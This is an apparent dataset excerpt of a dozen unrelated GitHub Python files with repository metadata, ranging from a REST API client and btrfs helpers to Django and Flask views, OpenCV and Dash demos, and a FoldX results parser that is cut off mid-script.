max_stars_repo_path
stringlengths 4
182
| max_stars_repo_name
stringlengths 6
116
| max_stars_count
int64 0
191k
| id
stringlengths 7
7
| content
stringlengths 100
10k
| size
int64 100
10k
|
---|---|---|---|---|---|
cloudrunner/api/base.py
|
CloudRunnerIO/cloudrunner
| 5 |
2168759
|
from copy import copy
import json
import logging
import requests
from exceptions import * # noqa
logging.basicConfig()
LOG = logging.getLogger("ApiClient")
LOG.setLevel(logging.INFO)
class ApiObject(object):
@classmethod
def _apify(cls, **kwargs):
return ApiObject(**kwargs)
def __init__(self, **kwargs):
self._values = kwargs
for k, v in kwargs.items():
if isinstance(v, dict):
setattr(self, k, self._apify(**v))
elif isinstance(v, (list, set, tuple)):
arr = []
for i in v:
if isinstance(i, dict):
arr.append(self._apify(**i))
else:
arr.append(i)
setattr(self, k, arr)
else:
setattr(self, k, v)
@classmethod
def type(cls):
return getattr(cls, '_type', cls.__name__.lower())
class ReqMixin(object):
def _request(self, method, path, *args, **kwargs):
headers = copy(self.auth)
if kwargs:
headers.update(kwargs)
if 'content_type' in headers:
headers['Content-Type'] = kwargs["content_type"]
else:
headers['Content-Type'] = "application/json"
try:
full_path = "/".join([self.path, path])
LOG.debug("Sending request to %s [%s]" % (full_path, kwargs))
res = requests.request(method, full_path, data=json.dumps(kwargs),
headers=headers)
LOG.debug(res)
if res.status_code == 401:
raise NotAuthorized()
if res.status_code == 302:
raise NotModified()
return res.json()
except Exception, ex:
LOG.exception(ex)
return None
class ResourceManager(ReqMixin):
def __init__(self, path, models, wrapper=None, selector=None, suffix=None):
self.app_path = path
if isinstance(models, (set, list, tuple)):
self.models = models
self.mixed = True
else:
self.models = [models]
self.mixed = False
self.wrapper = wrapper
self.selector = selector
self.suffix = suffix
def _unwrap(self, res):
items = []
if self.mixed:
tokens = self.wrapper.split(".")
data = res
for t in tokens:
data = data[t]
for model in self.models:
_wrapper = getattr(model, 'wrapper', model.type()).lower()
_wrapper = "%s%s" % (_wrapper, self.suffix)
if _wrapper in data:
for i in data[_wrapper]:
items.append(model(**i))
else:
_wrapper = self.wrapper or self.models[0].type()
tokens = _wrapper.split(".")
data = res
for t in tokens:
data = data[t]
if isinstance(data, (set, list, tuple)):
for item in data:
items.append(self.models[0](**item))
else:
return self.models[0](**data)
return items
def _get_selector(self, api):
if self.selector:
urlargs = str(getattr(api, self.selector))
if not urlargs:
urlargs = getattr(api, 'id') or ''
urlargs = str(urlargs)
return urlargs
def list(self, *args, **kwargs):
res = self._request('get', '/'.join([self.app_path] + list(args)),
**kwargs)
items = []
items = self._unwrap(res)
return items
def item(self, *args, **kwargs):
if args and isinstance(args[0], ApiObject):
api = args[0]
urlargs = self._get_selector(api)
else:
urlargs = "/".join(args)
res = self._request('get', '/'.join([self.app_path, urlargs]),
**kwargs)
LOG.debug(res)
items = []
items = self._unwrap(res)
return items
def add(self, model):
res = self._request('post', self.app_path, **model._values)
if res.get('success'):
return True
else:
return "ERROR: " % res.get("error", {}).get("msg")
def update(self, key, model):
res = self._request(
'get', '/'.join([self.app_path, key]), **model._values)
if res.get('success'):
return True
else:
return "ERROR: " % res.get("error", {}).get("msg")
def replace(self, key, model):
res = self._request('put', '/'.join([self.path, key]), **model._values)
if res.get('success'):
return True
else:
return "ERROR: " % res.get("error", {}).get("msg")
def remove(self, key):
if isinstance(key, ApiObject):
name = key.name
else:
name = key
res = self._request('delete', '/'.join([self.app_path, name]))
if res.get('success'):
return True
else:
return "ERROR: %s" % res.get("error", {}).get("msg")
_REST__subclasses = []
class RESTfulType(type):
def __init__(cls, name, bases, dct):
global __REST__subclasses
if name == "RESTResource":
cls._subclasses = _REST__subclasses
else:
for base in bases:
if base.__name__ == "RESTResource":
_REST__subclasses.append(cls)
cls._resources = []
for k, v in dct.items():
if isinstance(v, ResourceManager):
cls._resources.append(v)
super(RESTfulType, cls).__init__(name, bases, dct)
def __call__(cls, *args, **kwargs):
obj = super(RESTfulType, cls).__call__(*args, **kwargs)
return obj
class RESTResource(ReqMixin):
__metaclass__ = RESTfulType
def __init__(self, auth=None, path=None):
self.auth = auth
self.path = path
for res in self._resources:
res.auth = self.auth
res.path = self.path
@classmethod
def __subclasses__(cls):
return self._subclasses
| 6,228 |
scripts/ais_nmea_uscg_timeshift.py
|
rolker/noaadata
| 35 |
2169536
|
#!/usr/bin/env python
"""Calculate the within minute slew of the USCG timestamp compared to
the extended "T" time within the minute. I hope this comes from the
receiver GPS time and not from AISLogger. Actually, this just shows
that they all move together. I thought that this was done by the
receiver, but no, it appears to be done by the java logging code.
"""
import datetime
import sys
import ais.ais_msg_1_handcoded as ais_msg_1
import ais.ais_msg_4_handcoded as ais_msg_4
from aisutils.uscg import uscg_ais_nmea_regex
from aisutils import binary
print '* emacs org-mode table'
print '#+ATTR_HTML: border="1" rules="all" frame="all"'
print '|USCG datetime| cg s | dt cg s | T | dT | t | S | slot t |',
print 'msg slot num | msg slot t|msg hour| msg min | msg sec | MMSI |'
all_keys = set()
cg_s_prev = None
time_of_arrival_prev = None
for line in file(sys.argv[1]):
line = line.rstrip()
if len(line) < 5 or 'AIVDM' not in line:
continue
match = uscg_ais_nmea_regex.search(line).groupdict()
cg_s = float(match['timeStamp'])
uscg = datetime.datetime.utcfromtimestamp(float(match['timeStamp']))
if cg_s_prev is not None:
dt = cg_s - cg_s_prev
dt = '%5d' % dt
else:
dt = 'N/A'.rjust(5)
cg_s_prev = cg_s
try:
time_of_arrival = float(match['time_of_arrival'])
except:
time_of_arrival = None
if time_of_arrival is None:
dt_time_of_arrival = 'N/A'.rjust(8)
else:
if time_of_arrival_prev is not None:
dt_time_of_arrival = time_of_arrival - time_of_arrival_prev
dt_time_of_arrival = '%8.4f' % dt_time_of_arrival
else:
dt_time_of_arrival = 'N/A'.rjust(8)
time_of_arrival_prev = time_of_arrival
try:
slot_num = int(match['slot'])
slot_t = slot_num / 2250. * 60
slot_t = '%5.2f' % slot_t
except:
slot_num = 'N/A'
slot_t = 'N/A'
print '|',uscg,'|',cg_s,'|',dt,'|',time_of_arrival,'|', dt_time_of_arrival,'|', match['t_recver_hhmmss'], '|',slot_num, '|',slot_t , '|',
if match['body'][0] in ('1','2','3'):
bits = binary.ais6tobitvec(match['body'])
msg = ais_msg_1.decode(bits)
#print msg.keys()
#all_keys.update(set(msg.keys()))
msg_slot = 'N/A'
if 'slot_number' not in msg:
msg['slot_number'] = 'N/A'
msg['slot_time'] = 'N/A'
else:
msg['slot_time'] = msg['slot_number'] / 2250. * 60
if 'commstate_utc_hour' not in msg:
msg['commstate_utc_hour'] = msg['commstate_utc_min'] = 'N/A'
print '{slot_number}|{slot_time}|{commstate_utc_hour}|{commstate_utc_min}|{TimeStamp}|{UserID}|'.format(**msg)
elif match['body'][0] == '4':
bits = binary.ais6tobitvec(match['body'])
msg = ais_msg_4.decode(bits)
all_keys.update(set(msg.keys()))
#print msg
msg_slot = 'N/A'
if 'slot_number' not in msg:
msg['slot_number'] = 'N/A'
msg['slot_time'] = 'N/A'
else:
msg['slot_time'] = msg['slot_number'] / 2250. * 60
#print '|',uscg,'|',cg_s,'|',dt,'|',time_of_arrival,'|', dt_time_of_arrival,'|', match['t_recver_hhmmss'], '|',slot_num, '|','%5.2f' % slot_t , '|',
print '{slot_number}|{slot_time}|{Time_hour}|{Time_min}|{Time_sec}| b{UserID}|'.format(**msg)
else:
print '|'*6
pass
#print all_keys
| 3,460 |
lib/fs_btrfs.py
|
hoefkensj/BTRWin
| 0 |
2170966
|
#!/usr/bin/env python
import os
def create_subv(parent,name):
"""
:param parent:
:param name:
:return:
"""
import btrfsutil
subv=os.path.join(parent, name)
btrfsutil.create_subvolume(subv)
install_btrfs_subv_meta(subv)
return subv
def del_subv(parent,name):
"""
:param parent:
:param name:
:return:
"""
import btrfsutil
subv=os.path.join(parent, name)
deleted=btrfsutil.delete_subvolume(subv)
return deleted
def create_snapshot(parent,src,dst):
"""
:param parent:
:param src:
:param dst:
:return:
"""
import btrfsutil
subv_src=os.path.join(parent, src)
subv_dst=os.path.join(parent, dst)
btrfsutil.create_snapshot(subv_src,subv_dst)
return
def get_subvs(parent):
"""
:param parent:
:return:
"""
import btrfsutil
#ls_dirs=[os.path.join(parent, name) for name in os.listdir(parent) if os.path.isdir(os.path.join(parent, name))]
return [directory for directory in os.listdir(parent) if btrfsutil.is_subvolume(directory)]
def install_btrfs_subv_meta(subv):
"""
:param subv:
:return:
"""
ini=os.path.join(subv, 'desktop.ini')
dot=os.path.join(subv, '.directory')
bang=os.path.join(subv, f'.!{subv.split("/")[-1].upper()}!.')
with open(ini, 'w') as file:
contents=f'[.ShellClassInfo]\r\nIconResource=C:\Windows\System32\SHELL32.dll,7'
file.write(contents)
with open(dot, 'w') as file:
contents=f'[Desktop Entry]\nIcon=drive-partition'
file.write(contents)
with open(bang, 'w') as file:
contents=f'# {subv.split("/")[-1].upper()}\n[Desktop Entry]\nIcon=drive-partition'
file.write(contents)
| 1,550 |
demisto_sdk/tests/integration_tests/run_integration_test.py
|
kfirstri/demisto-sdk
| 0 |
2169954
|
import pytest
from click.testing import CliRunner
from demisto_client.demisto_api import DefaultApi
from demisto_sdk.__main__ import main
from demisto_sdk.commands.common.legacy_git_tools import git_path
from demisto_sdk.commands.run_cmd.runner import Runner
DEBUG_FILE_PATH = f'{git_path()}/demisto_sdk/commands/run_cmd/tests/test_data/kl-get-component.txt'
YAML_OUTPUT = """arguments: []
name: kl-get-records
outputs:
- contextPath: Keylight.ID
description: ''
type: Number
- contextPath: Keylight.Name
description: ''
type: String
- contextPath: Keylight.ShortName
description: ''
type: String
- contextPath: Keylight.SystemName
description: ''
type: String"""
@pytest.fixture
def set_environment_variables(monkeypatch):
# Set environment variables required by runner
monkeypatch.setenv('DEMISTO_BASE_URL', 'http://demisto.instance.com:8080/')
monkeypatch.setenv('DEMISTO_API_KEY', 'API_KEY')
monkeypatch.delenv('DEMISTO_USERNAME', raising=False)
monkeypatch.delenv('DEMISTO_PASSWORD', raising=False)
def test_integration_run_non_existing_command(mocker, set_environment_variables):
"""
Given
- Non-existing command to run.
- Debug and Verbose option to increase coverage
When
- Running `run` command.
Then
- Ensure output is the appropriate error.
"""
mocker.patch.object(DefaultApi, 'investigation_add_entries_sync', return_value=None)
mocker.patch.object(Runner, '_get_playground_id', return_value='pg_id')
result = CliRunner(mix_stderr=False, ).invoke(main, ['run', '-q', '!non-existing-command', '-D', '-v'])
assert 0 == result.exit_code
assert not result.exception
assert 'Command did not run, make sure it was written correctly.' in result.output
assert not result.stderr
def test_json_to_outputs_flag(mocker, set_environment_variables):
"""
Given
- kl-get-components command
When
- Running `run` command on it with json-to-outputs flag.
Then
- Ensure the json_to_outputs command is running correctly
"""
# mocks to allow the command to run locally
mocker.patch.object(Runner, '_get_playground_id', return_value='pg_id')
mocker.patch.object(Runner, '_run_query', return_value=['123'])
# mock to get test log file
mocker.patch.object(DefaultApi, 'download_file', return_value=DEBUG_FILE_PATH)
# mock to set prefix instead of getting it from input
command = '!kl-get-records'
run_result = CliRunner(mix_stderr=False, ).invoke(main, ['run', '-q', command, '--json-to-outputs', '-p', 'Keylight', '-r'])
assert 0 == run_result.exit_code
assert not run_result.exception
assert YAML_OUTPUT in run_result.stdout
assert not run_result.stderr
def test_json_to_outputs_flag_fail_no_prefix(mocker, set_environment_variables):
"""
Given
- kl-get-components command
When
- Running `run` command on it with json-to-outputs flag and no prefix argument
Then
- Ensure the json_to_outputs command is failing due to no prefix argument provided.
"""
# mocks to allow the command to run locally
mocker.patch.object(Runner, '_get_playground_id', return_value='pg_id')
mocker.patch.object(Runner, '_run_query', return_value=['123'])
# mock to get test log file
mocker.patch.object(DefaultApi, 'download_file', return_value=DEBUG_FILE_PATH)
# mock to set prefix instead of getting it from input
command = '!kl-get-records'
run_result = CliRunner(mix_stderr=False, ).invoke(main, ['run', '-q', command, '--json-to-outputs'])
assert 1 == run_result.exit_code
assert 'A prefix for the outputs is needed for this command. Please provide one' in run_result.stdout
assert not run_result.stderr
| 3,794 |
hello.py
|
MockArch/bob_login_page
| 0 |
2170585
|
from flask import Flask, render_template, request, jsonify
import atexit
import cf_deployment_tracker
import os
import json
from mongo import Conn
# Emit Bluemix deployment event
cf_deployment_tracker.track()
app = Flask(__name__)
port = int(os.getenv('PORT', 8000))
@app.route('/')
def home():
return render_template('index.html')
@app.route('/api/visitors', methods=['GET'])
def get_visitor():
return jsonify(list(map(lambda doc: doc['name'], Conn().user_info.find({}))))
@app.route('/api/visitors', methods=['POST'])
def put_visitor():
user = request.json['name']
data = {'name':user}
Conn().user_info.insert_one(data)
return 'Hello %s! I added you to the database.' % user
if __name__ == '__main__':
app.run(host='0.0.0.0', port=port, debug=True)
| 794 |
OpenCV-Python/Basics/Joining_Multiple_Images_To_Display.py
|
mehulcparikh/ComputerVision
| 0 |
2169480
|
####################### STACKING USING THE FUNCTION #####################
import cv2
import numpy as np
frameWidth = 640
frameHeight = 480
cap = cv2.VideoCapture(0)
cap.set(3, frameWidth)
cap.set(4, frameHeight)
def stackImages(imgArray,scale,lables=[]):
sizeW= imgArray[0][0].shape[1]
sizeH = imgArray[0][0].shape[0]
rows = len(imgArray)
cols = len(imgArray[0])
rowsAvailable = isinstance(imgArray[0], list)
width = imgArray[0][0].shape[1]
height = imgArray[0][0].shape[0]
if rowsAvailable:
for x in range ( 0, rows):
for y in range(0, cols):
imgArray[x][y] = cv2.resize(imgArray[x][y], (sizeW, sizeH), None, scale, scale)
if len(imgArray[x][y].shape) == 2: imgArray[x][y]= cv2.cvtColor( imgArray[x][y], cv2.COLOR_GRAY2BGR)
imageBlank = np.zeros((height, width, 3), np.uint8)
hor = [imageBlank]*rows
hor_con = [imageBlank]*rows
for x in range(0, rows):
hor[x] = np.hstack(imgArray[x])
hor_con[x] = np.concatenate(imgArray[x])
ver = np.vstack(hor)
ver_con = np.concatenate(hor)
else:
for x in range(0, rows):
imgArray[x] = cv2.resize(imgArray[x], (sizeW, sizeH), None, scale, scale)
if len(imgArray[x].shape) == 2: imgArray[x] = cv2.cvtColor(imgArray[x], cv2.COLOR_GRAY2BGR)
hor= np.hstack(imgArray)
hor_con= np.concatenate(imgArray)
ver = hor
if len(lables) != 0:
eachImgWidth= int(ver.shape[1] / cols)
eachImgHeight = int(ver.shape[0] / rows)
print(eachImgHeight)
for d in range(0, rows):
for c in range (0,cols):
cv2.rectangle(ver,(c*eachImgWidth,eachImgHeight*d),(c*eachImgWidth+len(lables[d][c])*13+27,30+eachImgHeight*d),(255,255,255),cv2.FILLED)
cv2.putText(ver,lables[d][c],(eachImgWidth*c+10,eachImgHeight*d+20),cv2.FONT_HERSHEY_COMPLEX,0.7,(255,0,255),2)
return ver
while True:
success, img = cap.read()
kernel = np.ones((5,5),np.uint8)
print(kernel)
#path = "Resources/lena.png"
#img = cv2.imread(path)
imgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
imgBlur = cv2.GaussianBlur(imgGray,(7,7),0)
imgCanny = cv2.Canny(imgBlur,100,200)
imgDilation = cv2.dilate(imgCanny,kernel , iterations = 2)
imgEroded = cv2.erode(imgDilation,kernel,iterations=2)
#imgBlank = np.zeros((200,200),np.uint8)
StackedImages = stackImages(([img,imgGray,imgBlur],
[imgCanny,imgDilation,imgEroded]),0.6)
cv2.imshow("Staked Images", StackedImages)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
################### Stacking images without Function ################
# import cv2
# import numpy as np
# img1 = cv2.imread('../Resources/lena.png',0)
# img2 = cv2.imread('../Resources/land.jpg')
# print(img1.shape)
# print(img2.shape)
# img1 = cv2.resize(img1, (0, 0), None, 0.5, 0.5)
# img2 = cv2.resize(img2, (0, 0), None, 0.5, 0.5)
# img1 = cv2.cvtColor(img1, cv2.COLOR_GRAY2BGR)
# hor= np.hstack((img1, img2))
# ver = np.vstack((img1, img2))
# cv2.imshow('Vertical', ver)
# cv2.imshow('Horizontal', hor)
# cv2.waitKey(0)
| 3,209 |
sales/migrations/0013_auto_20200919_1519.py
|
zhou-en/turf_portal
| 0 |
2170642
|
# Generated by Django 3.1.1 on 2020-09-19 15:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sales', '0012_order_closed_date'),
]
operations = [
migrations.AddField(
model_name='buyer',
name='status',
field=models.CharField(choices=[('ACTIVE', 'Active'), ('INACTIVE', 'Inactive')], default='ACTIVE', max_length=255),
),
migrations.AlterField(
model_name='order',
name='status',
field=models.CharField(choices=[('DRAFT', 'Draft'), ('SUBMITTED', 'Submitted'), ('INVOICED', 'Invoiced'), ('DELIVERED', 'Delivered'), ('CLOSED', 'Closed')], default='DRAFT', max_length=255),
),
]
| 761 |
App-Launcher/lib/dialog_manager.py
|
SoftBankRoboticsEurope/app-launcher
| 4 |
2164356
|
# -*- coding: utf-8 -*-
import qi
class DialogManager:
_LANGUAGE_FORMAT_CONVERSION = dict(en_US="enu", fr_FR="frf", ja_JP="jpj", zh_CN="mnc",
es_ES="spe", de_DE="ged", ko_KR="kok", it_IT="iti", nl_NL="dun",
fi_FI="fif", pl_PL="plp", ru_RU="rur", tr_TR="trt",
ar_SA="arw", cs_CZ="czc", pt_PT="ptp", pt_BR="ptb",
sv_SE="sws", da_DK="dad", nn_NO="nor", el_GR="grg")
def __init__(self, logger, session, pref_manager, pages_definition_property, autonomous_enabled_property,
current_page_property):
self._logger = logger
self._session = session
self._logger.info("@ Creating Dialog manager...")
self._pref_manager = pref_manager
self._pages_definition = pages_definition_property
self._current_language = None
self._current_language_dlg = None
self._current_page = current_page_property
self._autonomous_enabled = autonomous_enabled_property
self._connection_pagedef = self._pages_definition.connect(self._create_pages_triggers_dialog)
self._session.waitForService("ALTextToSpeech")
self._tts = self._session.service("ALTextToSpeech")
self._on_language_changed(self._tts.locale())
self._con_language = self._tts.languageTTS.connect(self._on_language_changed)
qi.async(self._create_pages_triggers_dialog, self._pages_definition.value(), delay=1000000)
self._pref_dialog_always_running = self._pref_manager.get_value('dialogAlwaysRunning', True)
self.connection_autoena = self._autonomous_enabled.connect(self._on_autonomous_enabled_changed)
self._session.waitForService("ALMemory")
self.page_subscriber = self._session.service("ALMemory").subscriber("AppLauncher/PageRequired")
self.page_connection = self.page_subscriber.signal.connect(self.on_page_required)
self._logger.info("@ Dialog manager created!")
def cleanup(self):
self._logger.info("@ Cleaning dialog manager...")
try:
self._tts.languageTTS.disconnect(self._con_language)
self.page_subscriber.signal.disconnect(self.page_connection)
self._pages_definition.disconnect(self._connection_pagedef)
self._autonomous_enabled.disconnect(self.connection_autoena)
except Exception as e:
self._logger.info("@ Error while cleaning dialog manager: {}".format(e))
self._logger.info("@ Dialog manager is clean!")
def _create_pages_triggers_dialog(self, pages_definition):
self._logger.info("@ Updating dialog concept for pages")
page_name_list = []
for page_id in pages_definition.keys():
page_name = pages_definition[page_id]["title"]
page_name_list.append(page_name)
self._session.waitForService("ALDialog")
dialog = self._session.service("ALDialog")
dialog.setConcept("applauncher_pages_names", self._current_language_dlg, page_name_list)
self._logger.info("@ Pages are: {}".format(page_name_list))
def _on_language_changed(self, new_language):
self._logger.info("@ Language is now: {}".format(new_language))
self._current_language_pkg = new_language
self._current_language_dlg = self._LANGUAGE_FORMAT_CONVERSION[self._current_language_pkg]
def _on_autonomous_enabled_changed(self, enabled):
try:
forbidden = True
life = self._session.service("ALAutonomousLife")
if enabled:
forbidden = False
self._logger.info("@ Autonomous: {} (forbidden: {})".format(enabled, forbidden))
life._forbidAutonomousInteractiveStateChange(forbidden)
if forbidden:
self._stop_dialog()
else:
self._start_dialog()
except Exception as e:
self._logger.info("@ Error while changing automous mode: {}".format(e))
def _start_dialog(self):
try:
if self._pref_dialog_always_running:
self._logger.info("@ dialogAlwaysRunning: True -> starting dialog")
life = self._session.service("ALAutonomousLife")
mem = self._session.service("ALMemory")
mem.insertData("Dialog/DoNotStop", 1)
life.switchFocus("run_dialog_dev/.")
except Exception as e:
self._logger.error("@ Run dialog error: " + str(e))
def _stop_dialog(self):
try:
bm = self._session.service("ALBehaviorManager")
bm.stopBehavior("run_dialog_dev/.")
except Exception as e:
self._logger.error("@ Stop dialog error: " + str(e))
def on_page_required(self, page_request):
if page_request == "homepage":
self._current_page.setValue("Home")
return
list_page = self._pages_definition.value()
for page_id in list_page.keys():
if page_request in list_page[page_id]["title"]:
self._current_page.setValue(page_id)
return
| 5,187 |
nomadgram/images/views.py
|
zlyanz13/Yonwongram
| 0 |
2170189
|
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from . import models, serializers
from nomadgram.users import models as user_models
from nomadgram.locations import models as location_models
from nomadgram.users import serializers as user_serializers
# Create your views here.
class Images(APIView):
def get(self, request, format=None):
user = request.user
following_users = user.following.all()
image_list = []
for following_user in following_users:
user_images = following_user.images.all()[:2]
for image in user_images:
image_list.append(image)
my_images = user.images.all()[:2]
for image in my_images:
image_list.append(image)
sorted_list = sorted(image_list, key =lambda image: image.created_at, reverse= True)
serializer = serializers.ImageSerializer(sorted_list, many = True, context={'request' : request})
return Response(serializer.data)
def post(self, request, format=None):
user = request.user
data = request.data
print(data)
station_nm = data.get("station")
location = data.get("location")
stars = int('0'+data.get("stars"))
caption = data.get("caption")
tags = data.get("tags")
file = data.get("file")
try :
found_location = location_models.Location.objects.get(
station__station_nm = station_nm,
name=location)
print('location fount',found_location)
except location_models.Location.DoesNotExist:
station=location_models.Station.objects.filter(station_nm = station_nm).order_by('line_num')[0]
new_location=location_models.Location.objects.create(
name=location,
station = station)
models.Image.objects.create(file= file,location = new_location,
stars=stars, tags=tags, caption=caption, creator=user)
return Response(None, status= status.HTTP_201_CREATED)
"""user = request.user
serializer = serializers.InputImageSerializer(data=request.data)
if serializer.is_valid():
serializer.save(creator = user)
return Response(data = serializer.data, status= status.HTTP_201_CREATED)
else :
return Response(data = serializer.errors, status=status.HTTP_400_BAD_REQUEST)"""
class LikeImage(APIView):
def get(self, request, image_id, format= None):
likes = models.Like.objects.filter(image__id=image_id)
like_creator_ids = likes.values('creator_id')
users = user_models.User.objects.filter(id__in = like_creator_ids)#id__in mean search inside a Array
serializer = user_serializers.ListUserSerializer(users, many=True, context={"request": request})
return Response(data =serializer.data, status= status.HTTP_200_OK)
def post(self, request, image_id, format = None):
user = request.user
try:
found_image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=404)
try :
preexisting_like = models.Like.objects.get(
creator = user,
image = found_image
)
return Response(status=status.HTTP_304_NOT_MODIFIED)
except models.Like.DoesNotExist:
new_like = models.Like.objects.create(
creator = user,
image = found_image
)
new_like.save()
return Response(status = status.HTTP_200_OK)
class UnLikeImage(APIView):
def delete(self, request, image_id, format = None) :
user = request.user
try:
found_image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
try :
preexisting_like = models.Like.objects.get(
creator = user,
image = found_image
)
preexisting_like.delete()
return Response(status = status.HTTP_204_NO_CONTENT)
except models.Like.DoesNotExist:
return Response(status=status.HTTP_304_NOT_MODIFIED)
class CommentOnImage(APIView):
def post(Self, request, image_id, format = None) :
user = request.user
try:
found_image = models.Image.objects.get(id=image_id)
except models.Image.DoesNotExist:
return Response(status=404)
serializer = serializers.CommentSerializer(data=request.data)
if serializer.is_valid():
serializer.save(creator=user, image = found_image)
return Response(data=serializer.data, status =201)
else:
return Response(data = serializer.errors, status = 400)
class Comment(APIView):
def delete(Self, request, comment_id, format = None):
try:
comment = models.Comment.objects.get(id=comment_id, creator=request.user)
comment.delete()
return Response(status=204)
except models.Comment.DoesNotExist :
return Response(status=404)
class Search(APIView):
def get(self, request, format=None):
hashtags = request.query_params.get('hashtags', None)
if hashtags is not None :
hashtags = hashtags.split(",")
images = models.Image.objects.filter(tags__name__in = hashtags).distinct()
serializer = serializers.ImageSerializer(images, many=True, context={'request' : request})
return Response(data = serializer.data, status= status.HTTP_200_OK)
else :
images = models.Image.objects.all()[:20]
serializer = serializers.ImageSerializer(images, many=True, context={'request' : request})
return Response(data = serializer.data, status= status.HTTP_200_OK)
class ModerateComment(APIView):
def delete(self, request, image_id, comment_id, format=None):
user = request.user
try :
comment_to_delete = models.Comment.objects.get(id=comment_id, image__id = image_id, image__creator= user)
comment_to_delete.delete()
except models.Comment.DoesNotExist :
return Response(status= status.HTTP_404_NOT_FOUND)
return Response(status = status.HTTP_204_NO_CONTENT)
class ImageDetail(APIView):
def find_own_image(self, image_id, user):
try:
image = models.Image.objects.get(id=image_id, creator = user)
return image
except models.Image.DoesNotExist :
return None
def get(self, request, image_id, format =None ):
try :
image = models.Image.objects.get(id=image_id)
except models.DoesNotExist :
return Response(status= status.HTTP_404_NOT_FOUND)
serializer = serializers.ImageSerializer(image, context={'request' : request})
return Response(serializer.data, status=status.HTTP_200_OK)
def put(self, request, image_id, format = None):
user = request.user
image = self.find_own_image(image_id, user)
if image is None :
return Response(status= status.HTTP_400_BAD_REQUEST)
serializer = serializers.InputImageSerializer(image, data = request.data, partial = True )
if serializer.is_valid():
serializer.save(creator = user)
return Response(data = serializer.data, status= status.HTTP_204_NO_CONTENT)
else :
return Response(data = serializer.errors, status = status.HTTP_400_BAD_REQUEST)
def delete(self, request, image_id, format=None):
user = request.user
image = self.find_own_image(image_id, user)
if image is None :
return Response(status= status.HTTP_400_BAD_REQUEST)
image.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
"""
def get_key(image):
return image.created_at
class ListAllImages(APIView):
def get(self, request, format=None):
all_images = models.Image.objects.all()
serializer = serializers.ImageSerializer(all_images, many = True)
return Response(data = serializer.data)
class ListAllComments(APIView):
def get(self, request, format = None):
user_id = request.user.id
all_comments = models.Comment.objects.filter(creator = user_id)
serializer = serializers.CommentSerializer(all_comments, many = True)
return Response(data = serializer.data)
class ListAllLikes(APIView):
def get(self, request, format = None):
all_likes = models.Like.objects.all()
serializer = serializers.LikeSerializer(all_likes, many = True)
return Response(data = serializer.data)
"""
| 9,270 |
settings.py
|
epictaco302/epictacos-website
| 0 |
2170172
|
# Default settings file for the website
PORT = 80
ENABLE_HTTPS = False
ENABLE_LOGGING = False
SERVE_STATIC = False
SERVE_STORAGE = False
CERT_DIR = 'path/to/cert'
CERT_ROOT = 'CERT_ROOT'
TARGET_HOST = 'hiden.ooguy.com'
# Import settings from settings_local.py. If settings_local.py is not present, terminate
try:
from settings_local import *
except ImportError:
raise Exception("Please create settings_local.py")
| 429 |
network.py
|
rebeling/networking
| 1 |
2168799
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import json
from graph import marathon_graph
from marathon import MarathonClient
def generate_network_graph():
"""
1. connect to client, vpn must be on
2. transform martahon app list into networkx graph
3. save graph to file
4. serve the graph with d3 frontend
"""
from secrets import USERNAME, PASSWORD, MARATHON_URL
mc = MarathonClient(MARATHON_URL, username=USERNAME, password=PASSWORD)
print "Initilized {}\niterating apps...".format(mc)
result = marathon_graph(mc.list_apps())
result["MARATHON_URL"] = MARATHON_URL
filename = 'graphFile.json'
with open('visualization/{}'.format(filename), 'w') as f:
json.dump(result, f, indent=4)
print "Done."
if __name__ == "__main__":
generate_network_graph()
| 835 |
mz-funnel-chart-plotly/dash/app.py
|
dunithd/edu-samples
| 9 |
2170096
|
import psycopg2
import pandas.io.sql as sqlio
import pandas as pd
import dash
from dash import dcc
from dash import html
import plotly.express as px
app = dash.Dash(__name__)
# Connect to Materialize as a regular database
conn = psycopg2.connect("dbname=materialize user=materialize port=6875 host=localhost")
# Read the materialized view with Pandas
sql = "select * from consolidated_funnel order by cnt desc;"
df = pd.read_sql_query(sql, conn)
# Plot a funnel chart
fig = px.funnel(df, x="step", y="cnt")
# Main UI scaffolding for the dashboard
app.layout = html.Div(children=[
html.H1(children='Conversion Funnel'),
html.Div(children='''
Dash: A web application framework for your data.
'''),
dcc.Graph(
id='funnel-chart',
figure=fig
)
])
if __name__ == '__main__':
app.run_server(debug=True)
conn = None
| 866 |
scripts/displacement.py
|
Psirus/altay
| 0 |
2170395
|
import os
import sys
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from altai.lib import driver_database
from altai.lib import vented_box
from altai.lib import speaker
import matplotlib.pyplot as plt
import numpy as np
driver_db = driver_database.DriverDB.from_file('../altai/lib/driver_db.json')
driver = driver_db[0]
box = vented_box.VentedBox(Vab=90.0, fb=40.0, Ql=20.0)
speaker = speaker.VentedSpeaker(driver, box)
freqs, displacement = speaker.displacement()
plt.semilogx(freqs, displacement)
plt.show()
| 549 |
RFACA/foldx/foldx_results.py
|
JinyuanSun/my_bio_script
| 0 |
2169824
|
#!/usr/bin/python
#By <NAME> and <NAME>, 2021
import pandas as pd
import argparse
parser = argparse.ArgumentParser(description=
'Process files from previous foldx scan')
parser.add_argument("-sn", '--subdirnum', help="Total number of subdirectories")
parser.add_argument("-fn", '--fxoutname', help="Average_BuildModel_<pdbfilename>.fxout")
parser.add_argument("-c", '--cutoff',help="Cutoff of ddg")
args = parser.parse_args()
fxoutname = args.fxoutname
subnum = int(args.subdirnum)
cutoff = int(args.cutoff)
df_average_lst = []
for num in range(subnum):
num += 1
fxout_name = "Subdirectory"+str(num)+"/"+fxoutname
df_average = pd.read_table(fxout_name, sep='\t',skiprows=8)
df_average_lst.append(df_average)
df_list_lst = []
for num in range(subnum):
num += 1
list_name = "test/Subdirectory"+str(num)+"/List_Mutations_readable.txt"
df_list = pd.read_table(list_name, sep=" ",header=None)
df_list_lst.append(df_list)
df_average_all = pd.concat(df_average_lst, axis=0, ignore_index=True)
#df_average.head()
df_list_all = pd.concat(df_list_lst, axis=0, ignore_index=True)
df_o = df_average_all.iloc[:, 0:3].join(df_list_all)
odict = {'mutation':[],'energy':[],'SD':[],'position':[]}
